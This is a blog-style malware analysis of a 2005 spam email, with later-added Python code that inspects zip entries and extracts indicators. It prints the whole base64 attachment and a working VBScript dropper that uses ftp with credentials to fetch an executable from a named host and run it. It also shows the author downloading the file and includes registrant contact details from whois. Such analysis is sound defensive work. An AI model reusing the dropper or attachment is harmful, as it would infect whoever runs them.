Spam can hide nasty secrets...

So the other day I got an email:

From - Fri May 27 23:52:32 2005
X-Account-Key: account3
X-UIDL: 30db7b2dbab83eba4e8de694cbb999ae
X-Mozilla-Status: 0001
X-Mozilla-Status2: 10000000
X-Apparently-To: <myaddress>@yahoo.co.uk via 217.12.10.40; Fri, 27 May 2005 22:18:42 +0000
X-YahooFilteredBulk: 62.194.167.229
Authentication-Results: mta105.mail.ukl.yahoo.com
  from=gamebox.net; domainkeys=neutral (no sig)
X-Originating-IP: [62.194.167.229]
Return-Path: <wil_beike@gamebox.net>
Received: from 62.194.167.229  (EHLO h167229.upc-h.chello.nl) (62.194.167.229)
  by mta105.mail.ukl.yahoo.com with SMTP; Fri, 27 May 2005 22:18:42 +0000
Received: from gamebox.net (mx1.gamebox.net [38.113.3.58])
        by h167229.upc-h.chello.nl (Postfix) with ESMTP id QOH8O3X16D
        for <<myaddress>@yahoo.co.uk>; Fri, 27 May 2005 18:20:13 +0000
Date: Fri, 27 May 2005 18:20:13 +0000
From: Ken <wil_beike@gamebox.net>
X-Mailer: The Bat! (v3.0) UNREG / HPICQ9J9UAPIYSLDB
Reply-To: Jeannie <wil_beike@gamebox.net>
X-Priority: 3 (Normal)
Message-ID: <689146984975.10756168720543581@h167229.upc-h.chello.nl>
To: <myaddress>@yahoo.co.uk
Subject: We make a business offer to you
MIME-Version: 1.0
Content-type: multipart/mixed;
        boundary="----------N0FUQTL08W64CNLJ"

------------N0FUQTL08W64CNLJ
Content-Type: text/plain;
        charset="Windows-1252"
Content-Transfer-Encoding: 8bit

Hello! 

 It is not spam, so don't delete this message.
We have a business offer to you.
Read our offer.
You can increase the business in 1,5 times.
We hope you do not miss this information.

Best regards, Jackie

------------N0FUQTL08W64CNLJ
Content-type: application/octet-stream;
        name="agreement.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
        filename="agreement.zip"

UEsDBBQAAAAIADSMuzJyQ0OgKwUAAAAqAAAOAAAAYWdyZWVtZW50LnR4dP/tWs9vG0UUfrP+Edul
ieOWUKoIFpNERWo2baJCGiWRm6QmlCZpcSEHjIS9Xid27V1315aJxKEFCSpOOfTAAVEqFamqhBSQ
6IEKkb+A5oQ4BokjSG2VSw/N8mZ2N1lvbDmNWqIq+ykzb/bNzPfevBnHfmOv3GtfvfHj4b/AgVHw
wLoeBL9NR7C0Ww9hgIipW9d13VSB7sCwJqq5UpkvpOS5SmpOGol+MJZgqugoH9KkMl/V5rV5qVAY
EVUpVZaUdF4Sy0eiVWOiwPqi/Bt8KDViDRXUiswfiXaLSlErSWI33yfyxYuZnMqPDyVn35memJlN
JBMLWlkqDvQn0SDf08NL4rzCVzRJ5WW5tBCrSmlBLBVkWUCW0dHUxpDsW/0nC+fzGbsunZNT6oJd
M4eeF4vZgX5B+kRiZnNyRqlqNWaTGyPsUy9VcmXzOVsu8b3aUIrvlfneDHMsu+kVHZGRCjwb2tRE
9Oixo/FUQZMwVFU2UhALiibxoeE+I5ajzs1B/PP9MpyGoBe3LvKbsbMRVqOGYGmFdD6dH1sdW3We
EMBZHfDKCwD8V4QVsnVIDXS9rWnbwkesTpqUVNrbjeRBG0OJNJfoPHxqSks/zgHcQXnNfN6pDCAP
/kGIM563I7tQPkK5hhz/YvSz+Czg84tb4rO57msNwt7MP8G0e6tBPJ28zvm3GkjaH6rD43wOcPX9
du5Ts3138lE/Prb5Y8Hqd87fKSw+y/5V6xxBPvPwzl3iXMe3ZlwarXt3sH+3HXCxuzD/z7vYkyDW
/j/ebU9c/N8gYNt/F3sSpBNeXVrp45dWR15bCrREsby++J2vC0v30m4758KFi2eLCLRhVkLgQ5RW
YoJZaOyBzrFs1A/ToIAKRUhBAYyM1gvFyaD3LNCMn4OzqAnCJEg4IgM5kGEOeDgO9D6IgL+LHLh5
Hw7eHIZYD7wEJwJXxs90wruTnTBzhoPzWC5O/u2FODJRtnhdtn7GxtWykQhlezNwxU40CB7GM1iX
Z4DxeGp5OA/lqYnKMJyKPdRvoATogAlkySJPBSNQRpZz2FaxzLG6BPOoi2OUZOx1grB4scSQ3Y1Z
77cegI3P3l5b22fOo/0ttpau08i3wRSuRUS7CmhYssyfcbZDJRCgE9tDkMRRC6ifQL2IXhfRf+qb
hj1VFosqm5HBKAlY01F6DC5vJsTLj94n9dJjLmxbVgxzWVpRB9/uWEQVx/k9Pq+P83i/dCS51015
Ac1TdzR0bxplFeV76AA9XjL2nwgvEg58PsKRFj/nazGnhW1Ul2mVwAUWIY0z6aEciDLr+/xejsLr
qbMJFKdw0TnzIEcx4g8CVw8BrKCv82zIN4nQF9exGHNIDYOxkZ+Ht2otTZfTrIsdQQ3TDX8ZDyZg
/XRgHEddjzj0zV5QzfpduHDhwoULFy5cuHiuQJMX+uGY5i40D6X5J/3NB8286O86gmB8a7kPjCSW
fl/YCvSDs9H/GMu6rbh4vkCTb4UlNafZHYGKiTXAD7/sv7+90gE+YnHRc/Tn2rljP399r/3uZ3Ab
fv2dHhtYntBT9Bvx5T/iWSoPgJHF0/nH4QIm5GlMyaUnsmuVVuCYfXp+qdzOnAB1KmzYnzVvQpx3
Jdv15TDaJ7D5u6ftzAGbfcKSySImkzMYhfwTxyCCr177fja050AeLPvG69jF3gTB3feEjPPrDxrX
JMvGEYkfwmoqJ6qKpmTL/KyiZvgJRawUJbnM3hOmElSHKnY/R9uC1S8MwtrJny49jXcoF88S/wFQ
SwECFAAUAAAACAA0jLsyckNDoCsFAAAAKgAADgAAAAAAAAAAACAAAAAAAAAAYWdyZWVtZW50LnR4
dP9QSwUGAAAAAAEAAQA8AAAAVwUAAAAA

------------N0FUQTL08W64CNLJ--

I was thrilled! Increase my business in 1,5 times?? Why yes please!

Anyway, figuring that I run Linux and the attachment is guaranteed to be a Windows virus, I thought I'd investigate further: unzip the attachment to see what's in it, use the file tool to see what type of file it is, and take a close look!

$ mkdir sandbox
$ cd sandbox
$ unzip ../agreement.zip 
Archive:  ../agreement.zip
  inflating: agreement.txt
$ ls -l
total 12
-rw-r--r--  1 claude claude 10752 May 27 17:33 agreement.txt?
$ ls -lQ
total 12
-rw-r--r--  1 claude claude 10752 May 27 17:33 "agreement.txt\240"
$ file a*
agreement.txt : Microsoft Office Document
$ more a*
ÐÏࡱá>þÿ       þÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ<script language="VBScript"> 
set wshshell=createobject("wscript.shell" ) 
a=wshshell.run ("%comspec% /c mkdir C:\WINDOWS\System32\VBS && echo user nnpy@we
b.cplnn.com>>a && echo f729lQjd>>a && echo binary>>a && echo get mmf32.exe C:\Wi
ndows\System32\VBS\mmf32.exe>>a && echo quit>>a && ftp -s:a -n -d nnpyf.cplnn.co
m && del a && C:\Windows\System32\VBS\mmf32.exe",0,False) 
window.close 
</script>ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿì¥ÀE        ¿bjbjBàBà       ^L  ÿÿÿÿÿÿ]\\\\\\\p
--More--(6%)
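
The same look, taken before extracting anything, as an added example that is not part of the original post. It hand-builds a one-entry zip (the real attachment is not embedded; the entry name is "agreement.txt" plus byte 0xFF, which is what the 14-byte name in the archive's local file header actually holds, and the payload is a constructed stand-in for the OLE2-plus-script content that `more` showed), then walks the local file headers and reports the raw name bytes, the name as unzip or Python's zipfile would display it, and the content magic. The CP437 mapping is why the shell above shows `\240`: without the UTF-8 flag a zip entry name is read in the OEM code page, where 0xFF is a no-break space (U+00A0).

```python
"""Look at a zip's entry names and content magic before extracting anything.
Added example, not the post's code. The archive is constructed here: one stored
entry named "agreement.txt" + byte 0xFF (14 bytes, as in the real local header),
with a stand-in payload modelled on the `more` output: OLE2 magic, then <script>."""
import io
import struct
import zipfile
import zlib

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"            # what `more` rendered as "ÐÏࡱá"
SAMPLE_NAME = b"agreement.txt\xff"
SAMPLE_PAYLOAD = OLE2_MAGIC + b"\x00" * 8 + b'<script language="VBScript">window.close</script>'
MAGIC = {OLE2_MAGIC: "OLE2 compound document (Office)",
         b"MZ": "DOS/Windows executable",
         b"PK\x03\x04": "zip archive"}


def build_stored_zip(name: bytes, data: bytes) -> bytes:
    """Hand-assemble a one-entry, uncompressed zip so the raw name bytes are exactly
    `name` (zipfile.writestr would re-encode a non-ASCII str name as UTF-8)."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    local = struct.pack("<4sHHHHHIIIHH", b"PK\x03\x04", 20, 0, 0, 0, 0,
                        crc, len(data), len(data), len(name), 0) + name + data
    central = struct.pack("<4sHHHHHHIIIHHHHHII", b"PK\x01\x02", 20, 20, 0, 0, 0, 0,
                          crc, len(data), len(data), len(name), 0, 0, 0, 0, 0, 0) + name
    eocd = struct.pack("<4sHHHHIIH", b"PK\x05\x06", 0, 0, 1, 1, len(central), len(local), 0)
    return local + central + eocd


def displayed_name(raw: bytes, flags: int) -> str:
    """How unzip and Python's zipfile render the name: UTF-8 only when general-purpose
    flag bit 11 is set, otherwise CP437 (the OEM code page). CP437 0xFF is U+00A0
    NO-BREAK SPACE, hence the "agreement.txt\\240" in the `ls -lQ` output above."""
    return raw.decode("utf-8" if flags & 0x800 else "cp437", "replace")


def name_issues(raw: bytes, shown: str) -> list:
    issues = []
    if any(not 0x20 <= b <= 0x7E for b in raw):
        issues.append("name contains non-printable or non-ASCII bytes")
    if shown != shown.rstrip():
        issues.append("name ends in whitespace (U+%04X)" % ord(shown[-1]))
    real_ext = raw.rsplit(b".", 1)[-1]
    apparent_ext = shown.rstrip().rsplit(".", 1)[-1].encode("ascii", "replace")
    if real_ext != apparent_ext:
        issues.append("real extension %r is not the apparent %r" % (real_ext, apparent_ext))
    return issues


def inspect_local_entries(blob: bytes) -> list:
    """Walk the local file headers in order, writing nothing to disk. Stored (0) and
    deflated (8) entries whose sizes are in the header are handled; an entry using a
    data descriptor (flag bit 3) needs the central directory, so the walk stops there."""
    report, pos = [], 0
    while blob[pos:pos + 4] == b"PK\x03\x04":
        fields = struct.unpack_from("<4sHHHHHIIIHH", blob, pos)
        flags, method, csize, nlen, xlen = fields[2], fields[3], fields[7], fields[9], fields[10]
        if flags & 0x8:
            break
        raw = blob[pos + 30:pos + 30 + nlen]
        start = pos + 30 + nlen + xlen
        data = blob[start:start + csize]
        if method == 8:
            data = zlib.decompressobj(-15).decompress(data)
        shown = displayed_name(raw, flags)
        report.append({
            "raw": raw,
            "shown": shown,
            "issues": name_issues(raw, shown),
            "type": next((label for magic, label in MAGIC.items() if data.startswith(magic)), "unknown"),
            "script": b"<script" in data.lower(),     # an "Office document" carrying markup
        })
        pos = start + csize
    return report


def names_as_zipfile_sees(blob: bytes) -> list:
    """Cross-check: the stdlib reader applies the same CP437 rule to undecorated names."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return zf.namelist()


if __name__ == "__main__":
    archive = build_stored_zip(SAMPLE_NAME, SAMPLE_PAYLOAD)
    for entry in inspect_local_entries(archive):
        print(entry)
    print(names_as_zipfile_sees(archive))
```

The `issues` and `script` fields are the point: a ".txt" whose real extension is not `.txt`, whose bytes start like an Office document and contain a `<script>` tag, all learned before the entry is written anywhere a double-click could reach it.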

Hmm, this gives full instructions on how to get the virus payload. Of course, "agreement.txt\240" helps out people who aren't ftp savvy by doing all the hard work for them! How considerate! Time to fire up ncftp and see how far I can get...
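
Reconstructing what that one-liner does, as an added example that is not part of the original post. `DROPPER` is the VBScript quoted from the `more` output above with the terminal line wraps removed. The parser relies on two facts about the tools the dropper abuses: cmd.exe runs `&&`-separated steps left to right, so replaying every `echo TEXT>>a` rebuilds the file `a` line by line; and `ftp -s:a -n` feeds that file to ftp.exe, which after `user NAME` reads the password from the next line, which is why the bare line `f729lQjd` is the credential. The result is the indicator list (host, account, remote and local file, the path that gets executed) that the post went on to use by hand with ncftp.

```python
"""Replay a cmd.exe one-liner that writes an ftp script with `echo ...>>file`,
and pull the indicators out of it. Added example, not the post's code; DROPPER is the
VBScript quoted from the `more` output above, unwrapped at the terminal line breaks."""
import re

DROPPER = r'''<script language="VBScript">
set wshshell=createobject("wscript.shell" )
a=wshshell.run ("%comspec% /c mkdir C:\WINDOWS\System32\VBS && echo user nnpy@web.cplnn.com>>a && echo f729lQjd>>a && echo binary>>a && echo get mmf32.exe C:\Windows\System32\VBS\mmf32.exe>>a && echo quit>>a && ftp -s:a -n -d nnpyf.cplnn.com && del a && C:\Windows\System32\VBS\mmf32.exe",0,False)
window.close
</script>'''

RUN_CALL = re.compile(r'\.run\s*\(\s*"(.*?)"\s*,', re.IGNORECASE | re.DOTALL)
ECHO_REDIRECT = re.compile(r'^echo\s+(.*?)\s*(>>?)\s*(\S+)$', re.IGNORECASE)


def extract_command_line(script: str) -> str:
    """The string handed to WScript.Shell.Run, minus its `%comspec% /c` wrapper."""
    m = RUN_CALL.search(script)
    if not m:
        raise ValueError("no WScript.Shell.Run call found")
    return re.sub(r'^\s*%comspec%\s+/[ck]\s+', '', m.group(1), flags=re.IGNORECASE)


def split_cmd_steps(cmd: str) -> list:
    """cmd.exe runs `&&` steps on success, `||` on failure and `&` unconditionally;
    all three just separate steps for our purposes."""
    return [s.strip() for s in re.split(r'\s*(?:&&|\|\||&)\s*', cmd) if s.strip()]


def rebuild_echo_files(steps: list) -> dict:
    """Replay every `echo TEXT>>FILE` (append) / `echo TEXT>FILE` (truncate) to
    recover, line by line, each file the one-liner writes."""
    files = {}
    for step in steps:
        m = ECHO_REDIRECT.match(step)
        if m:
            text, op, path = m.groups()
            if op == ">":
                files[path] = []
            files.setdefault(path, []).append(text)
    return files


def parse_ftp_script(lines: list) -> dict:
    """Lines fed to ftp.exe by `-s:FILE`. After `user NAME` (with no password on the
    same line) ftp prompts and consumes the *next line* as the password, which is why
    the bare line `f729lQjd` is the credential."""
    info = {"user": None, "password": None, "binary": False, "downloads": []}
    expect_password = False
    for line in lines:
        tok = line.split()
        if expect_password:
            info["password"], expect_password = line.strip(), False
        elif tok and tok[0].lower() == "user":
            info["user"] = tok[1] if len(tok) > 1 else None
            info["password"] = tok[2] if len(tok) > 2 else None
            expect_password = len(tok) == 2
        elif tok and tok[0].lower() in ("binary", "bin"):
            info["binary"] = True
        elif tok and tok[0].lower() == "get" and len(tok) >= 2:
            info["downloads"].append((tok[1], tok[2] if len(tok) > 2 else tok[1]))
    return info


def extract_iocs(script: str) -> dict:
    """What an analyst wants from the dropper: directories it creates, the ftp session
    (host, account, files), what it deletes to cover its tracks, and what it runs."""
    steps = split_cmd_steps(extract_command_line(script))
    files = rebuild_echo_files(steps)
    iocs = {"mkdir": [], "deletes": [], "executes": [], "ftp": None, "files": files}
    for step in steps:
        tok = step.split()
        head = tok[0].lower() if tok else ""
        if head in ("mkdir", "md"):
            iocs["mkdir"] += tok[1:]
        elif head in ("del", "erase"):
            iocs["deletes"] += tok[1:]
        elif head == "ftp":
            opts = [t for t in tok[1:] if t.startswith("-")]
            script_file = next((t[3:] for t in opts if t.lower().startswith("-s:")), None)
            host = next((t for t in tok[1:] if not t.startswith("-")), None)  # -n: no auto-login
            iocs["ftp"] = dict(parse_ftp_script(files.get(script_file, [])),
                               host=host, script_file=script_file)
        elif head.endswith(".exe"):
            iocs["executes"].append(tok[0])
    return iocs


if __name__ == "__main__":
    for key, value in extract_iocs(DROPPER).items():
        print(key, value)
```

The `del a` step is worth noticing on its own: the script file is the only artifact on disk that names the FTP server and credentials, and the dropper removes it before running the payload, so on a victim machine those indicators survive only in the original attachment.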

$ ncftp -u nnpy@web.cplnn.com -p f729lQjd ftp://nnpyf.cpl 
NcFTP 3.1.8 (Jul 27, 2004) by Mike Gleason (http://www.NcFTP.com/contact/).
Remote host has closed the connection.                                                                  
Redialing (try 1)...                                                                                    
ProFTPD 1.2.10 Server (ProFTPD Default Installation) [217.107.212.179]
Logging in...                                                                                           
User nnpy@web.cplnn.com logged in.
Logged in to nnpyf.cplnn.com.                                                                           
Current remote directory is /.
ncftp / > binary
ncftp / > get mmf32.exe
mmf32.exe:                                              35.50 kB    7.29 kB/s  
ncftp / > quit

Hmm, I don't think I'll risk running the exe; maybe a hexdump will be enlightening? But first, let's see who we're dealing with:

$ whois cplnn.com

Whois Server Version 1.3

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: CPLNN.COM
   Registrar: ONLINENIC, INC.
   Whois Server: whois.OnlineNIC.com
   Referral URL: http://www.OnlineNIC.com
   Name Server: NS1.NAMESELF.COM
   Name Server: NS2.NAMESELF.COM
   Status: ACTIVE
   Updated Date: 20-mar-2005
   Creation Date: 20-mar-2005
   Expiration Date: 20-mar-2006


>>> Last update of whois database: Sun, 29 May 2005 20:39:17 EDT <<<


Registrant:
         Sergey Litvinov sspwife_2003@mail.ru +7.3007193627
         Private Person
         Abay str. 79-34
         Semipalatinsk,Semipalatinskaya,KAZAKSTAN 487000


Domain Name:cplnn.com 
Record last updated at 2005-03-20 19:45:29
Record created on 2005/3/20
Record expired on 2006/3/20


Domain servers in listed order:
         ns1.nameself.com        ns2.nameself.com 

Administrator:
         Sergey Litvinov sspwife_2003@mail.ru +7.3007193627
         Private Person

         Abay str. 79-34
         Semipalatinsk,Semipalatinskaya,KAZAKSTAN 487000


Technical Contactor:
         Sergey Litvinov sspwife_2003@mail.ru +7.3007193627
         Private Person
         Abay str. 79-34
         Semipalatinsk,Semipalatinskaya,KAZAKSTAN 487000

Billing Contactor:
         Sergey Litvinov sspwife_2003@mail.ru +7.3007193627
         Private Person
         Abay str. 79-34
         Semipalatinsk,Semipalatinskaya,KAZAKSTAN 487000


Registration Service Provider:
        name: Regtime.net 
        tel: +7 8462788201
        fax: +7 8462788201
        web:http://www.webnames.ru

Now that's out of the way, here are the edited highlights of the hexdump:

00000000  4d 5a 50 00 02 00 00 00  04 00 0f 00 ff ff 00 00  |MZP.............|
00000010  b8 00 00 00 00 00 00 00  40 00 1a 00 00 00 00 00  |........@.......|
00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 01 00 00  |................|
00000040  ba 10 00 0e 1f b4 09 cd  21 b8 01 4c cd 21 90 90  |........!..L.!..|
00000050  54 68 69 73 20 70 72 6f  67 72 61 6d 20 6d 75 73  |This program mus|
00000060  74 20 62 65 20 72 75 6e  20 75 6e 64 65 72 20 57  |t be run under W|
00000070  69 6e 33 32 0d 0a 24 37  00 00 00 00 00 00 00 00  |in32..$7........|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

Oooh, look! It gives a handy hint that you need a non-ancient version of Windows.

00008a60  08 00 00 00 00 00 00 00  00 00 00 00 6b 65 72 6e  |............kern|
00008a70  65 6c 33 32 2e 64 6c 6c  00 56 69 72 74 75 61 6c  |el32.dll.Virtual|
00008a80  41 6c 6c 6f 63 00 56 69  72 74 75 61 6c 46 72 65  |Alloc.VirtualFre|
00008a90  65 00 56 69 72 74 75 61  6c 50 72 6f 74 65 63 74  |e.VirtualProtect|
00008aa0  00 45 78 69 74 50 72 6f  63 65 73 73 00 00 00 00  |.ExitProcess....|
00008ab0  00 75 73 65 72 33 32 2e  64 6c 6c 00 4d 65 73 73  |.user32.dll.Mess|
00008ac0  61 67 65 42 6f 78 41 00  77 73 70 72 69 6e 74 66  |ageBoxA.wsprintf|
00008ad0  41 00 4c 4f 41 44 45 52  20 45 52 52 4f 52 00 54  |A.LOADER ERROR.T|
00008ae0  68 65 20 70 72 6f 63 65  64 75 72 65 20 65 6e 74  |he procedure ent|
00008af0  72 79 20 70 6f 69 6e 74  20 25 73 20 63 6f 75 6c  |ry point %s coul|
00008b00  64 20 6e 6f 74 20 62 65  20 6c 6f 63 61 74 65 64  |d not be located|
00008b10  20 69 6e 20 74 68 65 20  64 79 6e 61 6d 69 63 20  | in the dynamic |
00008b20  6c 69 6e 6b 20 6c 69 62  72 61 72 79 20 25 73 00  |link library %s.|
00008b30  54 68 65 20 6f 72 64 69  6e 61 6c 20 25 75 20 63  |The ordinal %u c|
00008b40  6f 75 6c 64 20 6e 6f 74  20 62 65 20 6c 6f 63 61  |ould not be loca|
00008b50  74 65 64 20 69 6e 20 74  68 65 20 64 79 6e 61 6d  |ted in the dynam|
00008b60  69 63 20 6c 69 6e 6b 20  6c 69 62 72 61 72 79 20  |ic link library |
00008b70  25 73 00 90 91 6f 01 00  a2 6f 01 00 b5 6f 01 00  |%s...o...o...o..|
00008b80  00 00 00 00 6b 65 72 6e  65 6c 33 32 2e 64 6c 6c  |....kernel32.dll|
00008b90  00 00 00 47 65 74 50 72  6f 63 41 64 64 72 65 73  |...GetProcAddres|
00008ba0  73 00 00 00 47 65 74 4d  6f 64 75 6c 65 48 61 6e  |s...GetModuleHan|
00008bb0  64 6c 65 41 00 00 00 4c  6f 61 64 4c 69 62 72 61  |dleA...LoadLibra|
00008bc0  72 79 41 00 00 00 00 00  00 00 00 00 00 00 00 00  |ryA.............|
00008bd0  84 6f 01 00 74 6f 01 00  00 00 00 00 00 00 00 00  |.o..to..........|
00008be0  00 00 00 00 78 70 01 00  cd 70 01 00 00 00 00 00  |....xp...p......|
00008bf0  00 00 00 00 00 00 00 00  83 70 01 00 d5 70 01 00  |.........p...p..|
00008c00  00 00 00 00 00 00 00 00  00 00 00 00 90 70 01 00  |.............p..|
00008c10  dd 70 01 00 00 00 00 00  00 00 00 00 00 00 00 00  |.p..............|
00008c20  9d 70 01 00 e5 70 01 00  00 00 00 00 00 00 00 00  |.p...p..........|
00008c30  00 00 00 00 aa 70 01 00  ed 70 01 00 00 00 00 00  |.....p...p......|
00008c40  00 00 00 00 00 00 00 00  b5 70 01 00 f5 70 01 00  |.........p...p..|
00008c50  00 00 00 00 00 00 00 00  00 00 00 00 c1 70 01 00  |.............p..|
00008c60  fd 70 01 00 00 00 00 00  00 00 00 00 00 00 00 00  |.p..............|
00008c70  00 00 00 00 00 00 00 00  75 73 65 72 33 32 2e 64  |........user32.d|
00008c80  6c 6c 00 61 64 76 61 70  69 33 32 2e 64 6c 6c 00  |ll.advapi32.dll.|
00008c90  6f 6c 65 61 75 74 33 32  2e 64 6c 6c 00 61 64 76  |oleaut32.dll.adv|
00008ca0  61 70 69 33 32 2e 64 6c  6c 00 75 73 65 72 33 32  |api32.dll.user32|
00008cb0  2e 64 6c 6c 00 77 73 6f  63 6b 33 32 2e 64 6c 6c  |.dll.wsock32.dll|
00008cc0  00 77 69 6e 69 6e 65 74  2e 64 6c 6c 00 05 71 01  |.wininet.dll..q.|
00008cd0  00 00 00 00 00 17 71 01  00 00 00 00 00 2a 71 01  |......q......*q.|
00008ce0  00 00 00 00 00 3a 71 01  00 00 00 00 00 4b 71 01  |.....:q......Kq.|
00008cf0  00 00 00 00 00 5e 71 01  00 00 00 00 00 6b 71 01  |.....^q......kq.|
00008d00  00 00 00 00 00 00 00 47  65 74 4b 65 79 62 6f 61  |.......GetKeyboa|
00008d10  72 64 54 79 70 65 00 00  00 52 65 67 51 75 65 72  |rdType...RegQuer|
00008d20  79 56 61 6c 75 65 45 78  41 00 00 00 53 79 73 46  |yValueExA...SysF|
00008d30  72 65 65 53 74 72 69 6e  67 00 00 00 52 65 67 53  |reeString...RegS|
00008d40  65 74 56 61 6c 75 65 45  78 41 00 00 00 54 72 61  |etValueExA...Tra|
00008d50  6e 73 6c 61 74 65 4d 65  73 73 61 67 65 00 00 00  |nslateMessage...|
00008d60  57 53 41 53 74 61 72 74  75 70 00 00 00 49 6e 74  |WSAStartup...Int|
00008d70  65 72 6e 65 74 52 65 61  64 46 69 6c 65 00 00 00  |ernetReadFile...|
00008d80  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

Hmm, a reference to GetKeyboardType. I wonder why it needs to do that; could it possibly be to latch into the keyboard system and log every single keypress? Also, some kind of reference to internet things (InternetReadFile; but note that information can be transmitted by the act of reading a specific URL, since you're telling the server what page you are getting!), so I imagine this program logs all your key presses and sends them to some server on the web. Better not do any internet banking if you run this bad boy! And some registry stuff (advapi32.dll, I looked up what it does on teh intarwebs), probably to make it run on every startup.
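
A way to get the same import-table reading from the hexdump text itself, with the two caveats a reader should put beside it. This is an added example, not the post's code; `SAMPLE_HEXDUMP` is a subset of the lines quoted above, non-contiguous exactly as the page shows them, and the only binary the code knows is that text. It parses `hexdump -C` rows back into byte segments, extracts printable strings the way `strings` does, and groups each run of DLL names with the API names that follow it. The two findings it adds are facts about the tools involved rather than claims about this sample: `MZP` at offset 0 together with the "This program must be run under Win32" stub is the Borland linker's signature, and the user32/advapi32/oleaut32 imports GetKeyboardType, RegQueryValueExA and SysFreeString are the ones Delphi's own runtime (the System unit) pulls in, so they mark a Delphi build rather than key logging; and VirtualAlloc/VirtualProtect/GetProcAddress/LoadLibraryA next to a table holding exactly one API per DLL is the shape of a packer's loader stub (the `LOADER ERROR` strings fit that too), whose real import list, including whatever it does with wininet and wsock32, is only resolved after it unpacks itself in memory. A static string dump of a packed binary shows the stub, not the program.

```python
"""Parse `hexdump -C` output back into bytes and read the import-table strings.
Added example (not the post's code); SAMPLE_HEXDUMP is a subset of the lines quoted
above, kept non-contiguous exactly as the page shows them."""
import re

SAMPLE_HEXDUMP = """\
00000000  4d 5a 50 00 02 00 00 00  04 00 0f 00 ff ff 00 00  |MZP.............|
00000050  54 68 69 73 20 70 72 6f  67 72 61 6d 20 6d 75 73  |This program mus|
00000060  74 20 62 65 20 72 75 6e  20 75 6e 64 65 72 20 57  |t be run under W|
00000070  69 6e 33 32 0d 0a 24 37  00 00 00 00 00 00 00 00  |in32..$7........|
00008a60  08 00 00 00 00 00 00 00  00 00 00 00 6b 65 72 6e  |............kern|
00008a70  65 6c 33 32 2e 64 6c 6c  00 56 69 72 74 75 61 6c  |el32.dll.Virtual|
00008a80  41 6c 6c 6f 63 00 56 69  72 74 75 61 6c 46 72 65  |Alloc.VirtualFre|
00008a90  65 00 56 69 72 74 75 61  6c 50 72 6f 74 65 63 74  |e.VirtualProtect|
00008aa0  00 45 78 69 74 50 72 6f  63 65 73 73 00 00 00 00  |.ExitProcess....|
00008ab0  00 75 73 65 72 33 32 2e  64 6c 6c 00 4d 65 73 73  |.user32.dll.Mess|
00008ac0  61 67 65 42 6f 78 41 00  77 73 70 72 69 6e 74 66  |ageBoxA.wsprintf|
00008ad0  41 00 4c 4f 41 44 45 52  20 45 52 52 4f 52 00 54  |A.LOADER ERROR.T|
00008b80  00 00 00 00 6b 65 72 6e  65 6c 33 32 2e 64 6c 6c  |....kernel32.dll|
00008b90  00 00 00 47 65 74 50 72  6f 63 41 64 64 72 65 73  |...GetProcAddres|
00008ba0  73 00 00 00 47 65 74 4d  6f 64 75 6c 65 48 61 6e  |s...GetModuleHan|
00008bb0  64 6c 65 41 00 00 00 4c  6f 61 64 4c 69 62 72 61  |dleA...LoadLibra|
00008bc0  72 79 41 00 00 00 00 00  00 00 00 00 00 00 00 00  |ryA.............|
00008c70  00 00 00 00 00 00 00 00  75 73 65 72 33 32 2e 64  |........user32.d|
00008c80  6c 6c 00 61 64 76 61 70  69 33 32 2e 64 6c 6c 00  |ll.advapi32.dll.|
00008c90  6f 6c 65 61 75 74 33 32  2e 64 6c 6c 00 61 64 76  |oleaut32.dll.adv|
00008ca0  61 70 69 33 32 2e 64 6c  6c 00 75 73 65 72 33 32  |api32.dll.user32|
00008cb0  2e 64 6c 6c 00 77 73 6f  63 6b 33 32 2e 64 6c 6c  |.dll.wsock32.dll|
00008cc0  00 77 69 6e 69 6e 65 74  2e 64 6c 6c 00 05 71 01  |.wininet.dll..q.|
00008d00  00 00 00 00 00 00 00 47  65 74 4b 65 79 62 6f 61  |.......GetKeyboa|
00008d10  72 64 54 79 70 65 00 00  00 52 65 67 51 75 65 72  |rdType...RegQuer|
00008d20  79 56 61 6c 75 65 45 78  41 00 00 00 53 79 73 46  |yValueExA...SysF|
00008d30  72 65 65 53 74 72 69 6e  67 00 00 00 52 65 67 53  |reeString...RegS|
00008d40  65 74 56 61 6c 75 65 45  78 41 00 00 00 54 72 61  |etValueExA...Tra|
00008d50  6e 73 6c 61 74 65 4d 65  73 73 61 67 65 00 00 00  |nslateMessage...|
00008d60  57 53 41 53 74 61 72 74  75 70 00 00 00 49 6e 74  |WSAStartup...Int|
00008d70  65 72 6e 65 74 52 65 61  64 46 69 6c 65 00 00 00  |ernetReadFile...|
"""
HEXDUMP_LINE = re.compile(r"^([0-9a-fA-F]{4,16})\s+((?:[0-9a-fA-F]{2}\s+){1,16})\|")
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")       # strings(1)-style: 4+ printable bytes
API_NAME = re.compile(r"[A-Za-z][A-Za-z0-9]{3,}")      # identifier-shaped, no spaces or dots


def parse_hexdump(text):
    """[(offset, bytes)] segments; rows with adjoining offsets are merged so strings
    that cross a line boundary survive. '*' (repeat) rows are not expanded."""
    rows, segments = [], []
    for line in text.splitlines():
        m = HEXDUMP_LINE.match(line)
        if m:
            rows.append((int(m.group(1), 16), bytes.fromhex(m.group(2).replace(" ", ""))))
    for off, data in sorted(rows):
        if segments and segments[-1][0] + len(segments[-1][1]) == off:
            segments[-1] = (segments[-1][0], segments[-1][1] + data)
        else:
            segments.append((off, data))
    return segments


def extract_strings(segments):
    """[(absolute offset, text)] for every printable run, like `strings -t x`."""
    return [(base + m.start(), m.group().decode("ascii"))
            for base, data in segments for m in PRINTABLE_RUN.finditer(data)]


def import_groups(names):
    """Group each run of DLL names with the API names that follow it, in file order."""
    groups, dlls, apis = [], [], []
    for kind, text in names + [("dll", None)]:          # sentinel flushes the last group
        if kind == "api":
            apis.append(text)
            continue
        if apis:
            groups.append((dlls, apis))
            dlls, apis = [], []
        if text is not None:
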